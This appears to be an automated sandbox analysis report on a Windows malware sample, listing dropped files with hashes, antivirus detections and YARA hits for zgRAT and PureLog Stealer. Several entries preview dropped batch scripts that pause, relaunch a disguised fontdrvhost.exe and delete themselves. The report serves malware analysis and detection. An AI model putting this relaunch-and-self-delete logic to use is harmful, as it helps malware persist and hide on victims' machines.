                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.133660689688185
                                                                  Encrypted:false
                                                                  SSDEEP:3:CSCeBQNpn:CSWH
                                                                  MD5:1754647E9FDB454D1414575915AACDF3
                                                                  SHA1:9839CF89341F575D735171BD77D33C420F6CB441
                                                                  SHA-256:396F25500569C5BE7578E2B721E004B1E67CFFF9DFF5276C6027BBE9DB3F9C58
                                                                  SHA-512:4980AE79BDD5F9887109616F349E099717C5F728FDB5CBC6E018B4AFCF79CBC4219DEC03A5B73278815EBC8D37A2C864B8B3866DC533BAC75BA6BE8925046098
                                                                  Malicious:false
                                                                  Preview:c0kSEhgfkFnOsQcBitiiSQ4dP
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):3.9736606896881854
                                                                  Encrypted:false
                                                                  SSDEEP:3:aO5wrJ9:aZ99
                                                                  MD5:5F258CC8D7F515D8B986345E19366E7A
                                                                  SHA1:A7585DE712094A6A5E29A2F0E8B4FDDB8E8AFA0A
                                                                  SHA-256:012115DD1E401469A608D4541743F22F6A60060CB4ACEC6A20DA738EBF613FF5
                                                                  SHA-512:74DC6EE5FF367F918E99B8005A2A47E07059E4AF254E356520FAF1E86670B423D8BC45E6B4F3170D7981532ED21CAB701409FF076D19641168BC24249DC86B25
                                                                  Malicious:false
                                                                  Preview:sHxHq26d2dX4sNZ5JgREs45aX
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.088546729988578
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIx3S+cn:hCRLuVFOOr+DE1wkn238GKOZG1wkn23K
                                                                  MD5:1C73B623999E6677E063EE0352D1A0F3
                                                                  SHA1:031DCF8F982F903DEE7AB31BCBA948858A715CBD
                                                                  SHA-256:E04354E44BDD139CD12D85CE332324834DC6918F4BDF6184E06903A36A81B12E
                                                                  SHA-512:86F4C4971480B66B0172FD264D1225B9482377184B4B6FC1E7A58C9B7219E9DD698C4030E863EFBFE7BBB27CE31DD93DC71C9C6910BF0BFB9FAB0225A4791178
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\OwDUg2gYJx.bat"
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.323856189774723
                                                                  Encrypted:false
                                                                  SSDEEP:3:K6glLnO:K6gRO
                                                                  MD5:E96E76F8F4AFC6A853AF1CCAD8F65CFB
                                                                  SHA1:C924A6233E5AAB26BC7DB6E3CE679B2DE02EAFA0
                                                                  SHA-256:C8A4DD54005176253F1A4599C89EDEC652B90396CFF3C4552FD324204FF74482
                                                                  SHA-512:B78A128484605599F77B467991B6483B96A400F31F8A53E76A4E6CC9FCCDADDF89A75E396BFDA841A11AE21DBD1A08B0FA51BE8C89930DA3D1FF514C9816B194
                                                                  Malicious:false
                                                                  Preview:NT5jNy3CEntQz2juI2GTAWRZS
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.243856189774724
                                                                  Encrypted:false
                                                                  SSDEEP:3:ZIUzij/d2c:+Mu/l
                                                                  MD5:A9820AFE0A394F7E478522267BDE8BF9
                                                                  SHA1:4F3CC230B64D27DEC1BD1687C3AE723180687D1B
                                                                  SHA-256:7560FA1A2D84FB8FD0B1CE346075DFF4EBC95C2D57CD401EA5E86494B120C286
                                                                  SHA-512:9DDA6A3FBB6D17353B6ECDB19117C847F5EADFFAA35C4EB20BC59D080379022673F928B3D736A52E4B33BC25ED680985E10EF3C627B4ABA745D9A7C34DC6097F
                                                                  Malicious:false
                                                                  Preview:4sIFLYVT1BVGyYv0sorrIE8S9
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):220
                                                                  Entropy (8bit):5.098885634200602
                                                                  Encrypted:false
                                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wkn238GKOZG1wkn23fiH:HTg9uYDEmfHf6H
                                                                  MD5:85D5103EC14539FA1803D5459456F23F
                                                                  SHA1:5EF815F153B412F9601D2781745B560123354A0D
                                                                  SHA-256:B0740108443F438024FD4E9533B8D5AE986E62CBD274C31CCB3E9DF4184D20ED
                                                                  SHA-512:4339027C6D7B97BE2A044584427F91696C69F476F16359A919312B6F7393318DE5A77C086C7D1174884677D97945C66AA812FB3A7D9928F9DA6C3F756B75DF69
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ZMh4UPVO0I.bat"
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.056310050289938
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIrOn:hCRLuVFOOr+DE1wkn238GKOZG1wkn23y
                                                                  MD5:73D982FE0770009A1C0A83A1C66118A3
                                                                  SHA1:9E74F046B127C4855916C8CEBCF32619645B65A7
                                                                  SHA-256:E3BF49ABDA03EE68024741CDB154CFA18206D27FEE0CC82E5BE192034A3B94F0
                                                                  SHA-512:85D34EF0E86C2A8BAC435201AE66C20A3B388C8925B865748A21730ED992E0A766C5E3817DC90980D0AC261C89A4461DA5242CF1B55620F66E7E17E7EDCC4824
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\e2HUAivGfO.bat"
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):220
                                                                  Entropy (8bit):5.041631355421024
                                                                  Encrypted:false
                                                                  SSDEEP:6:hCijTg3Nou1SV+DE1wkn238GKOZG1wkn23fth:HTg9uYDEmfHflh
                                                                  MD5:BD80F9AFD1C2BADCE5C6F813B89D778C
                                                                  SHA1:FB223B898390742CDFBE09CF1CDCEEB9DF8CC458
                                                                  SHA-256:96490DE29E333B75700430D85F321F6F171EB4B4776CE71D157DD732D6EB7E39
                                                                  SHA-512:2C83139FE9687A5D99490A33E7A4959652920171AD07A796BED1F3EEB6B7098FDC2D9F8EDFC40BAA5C292D81301B450CA5F30756FBBED07866FE26F63FB0862E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\s2nU7uS06N.bat"
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.133660689688186
                                                                  Encrypted:false
                                                                  SSDEEP:3:45XnAbQ5n:45Xn1n
                                                                  MD5:D01CE31905D60CA4428EA3FCA29CB691
                                                                  SHA1:E8589EBE6D57FD0032196CC7F76B897AE10D92B1
                                                                  SHA-256:BEF7ACFA6E363B49D848BA46F4D0052CAC6200CE1D4C979A791331848020E4DE
                                                                  SHA-512:5E8178F5861F96BA7C5565F624D8EC0CD7C139925D2B2289466DB5C1F1A5B01576E8B46EB18781D6A0114713BFE6B6D89EFE8900D35DE6D13FE07578F7A74189
                                                                  Malicious:false
                                                                  Preview:QdLfEUb8rsbvsDeT595d251Tn
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.036241715905151
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIETahGK:hCRLuVFOOr+DE1wkn238GKOZG1wkn23f
                                                                  MD5:DB438837DB9485071B5B219A1B9A08BE
                                                                  SHA1:D5D48DE6D3AC1AB28C78AAEAC41E491F9238A7A6
                                                                  SHA-256:0336C04B0754D8206F9AB057C8178ED915A8B0BE9E6200E4F2CC6BBA18BF09BB
                                                                  SHA-512:47F02E82A1BF49C9EB99D80565BE7915CBE64FED5D0A4DDBDC70F589E4AAC65411175FCBD3A8350B33B3A505383A0E83A6F71BD39B3F79DF196DAECAFCB68D12
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\wuC6fcDv5B.bat"
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3672576
                                                                  Entropy (8bit):7.822210869380534
                                                                  Encrypted:false
                                                                  SSDEEP:98304:ce0NRfHctOXBignPFAfL7B71KHijptuNMsZ:c1lckBiKPJCVt4Z
                                                                  MD5:4164D5955C244FF266C1CC41013FE21A
                                                                  SHA1:CD4B6CAAB8B3762D3AF3B7AD738F51D2E92C2D34
                                                                  SHA-256:138905D6721C1E6B174B6F61154A938565C9BD5C6B5B0ABE8274054BF151DA9C
                                                                  SHA-512:FA321BE81DCB76D26ACA25E1AA82145204ACDBD94026556F1031B6D29176096ABF7DE47C36DABD8A4C1C578B3BEA04E31A639481FB3890C593E597720E14E444
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\fontdrvhost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\fontdrvhost.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                                  • Antivirus: Virustotal, Detection: 73%
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:false
                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  • Antivirus: Virustotal, Detection: 20%
                                                                  Joe Sandbox View:
                                                                  • Filename: O5OjRoFGIW.exe, Detection: malicious
                                                                  • Filename: iY40ylvr5y.exe, Detection: malicious
                                                                  • Filename: 7GTGpZi6oi.exe, Detection: malicious
                                                                  • Filename: GWCscceJsW.exe, Detection: malicious
                                                                  • Filename: QHZoYVBjSD.exe, Detection: malicious
                                                                  • Filename: qObijSd3Uj.exe, Detection: malicious
                                                                  • Filename: 2EHDj2G1ow.exe, Detection: malicious
                                                                  • Filename: UU5WXfH85a.exe, Detection: malicious
                                                                  • Filename: k6AIKkidxG.exe, Detection: malicious
                                                                  • Filename: vFfb4XhxQq.exe, Detection: malicious
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                  • Antivirus: Virustotal, Detection: 7%
                                                                  Joe Sandbox View:
                                                                  • Filename: O5OjRoFGIW.exe, Detection: malicious
                                                                  • Filename: iY40ylvr5y.exe, Detection: malicious
                                                                  • Filename: qObijSd3Uj.exe, Detection: malicious
                                                                  • Filename: 2EHDj2G1ow.exe, Detection: malicious
                                                                  • Filename: k6AIKkidxG.exe, Detection: malicious
                                                                  • Filename: file.exe, Detection: malicious
                                                                  • Filename: Um5hcJ3WPo.exe, Detection: malicious
                                                                  • Filename: y48nZSvYdA.exe, Detection: malicious
                                                                  • Filename: 919KMNiWfM.exe, Detection: malicious
                                                                  • Filename: WyuZdl33w7.exe, Detection: malicious
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                  • Antivirus: Virustotal, Detection: 69%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 10%
                                                                  • Antivirus: Virustotal, Detection: 21%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  • Antivirus: Virustotal, Detection: 6%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                  • Antivirus: Virustotal, Detection: 6%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                  • Antivirus: Virustotal, Detection: 69%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 8%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
